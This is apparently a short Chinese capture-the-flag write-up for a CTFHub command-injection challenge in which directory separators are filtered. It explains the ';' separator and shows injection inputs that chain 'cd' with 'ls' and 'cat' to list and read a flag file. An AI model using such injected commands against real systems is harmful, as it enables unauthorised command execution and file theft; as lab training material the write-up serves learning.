RCE9-文件包含/命令注入/过滤目录分隔符(这里直接cd flag的目录;cat flag文件)
一.题目链接:
https://www.ctfhub.com/#/skilltree
二.基础知识
2.1
;命令的作用
1.为了使所有的命令一起执行
2.和&的区别:其实没啥本质区别,都是一样的同步执行命令,一个在前。一个在后
三.开始解题
1.进入是个登录界面,登不进去,我们先查看源码看看,发现存在use.php文件

2.
1;cd flag_is_here;ls

3.
1;cd flag_is_here;cat flag_22620475221124.php


浙公网安备 33010602011771号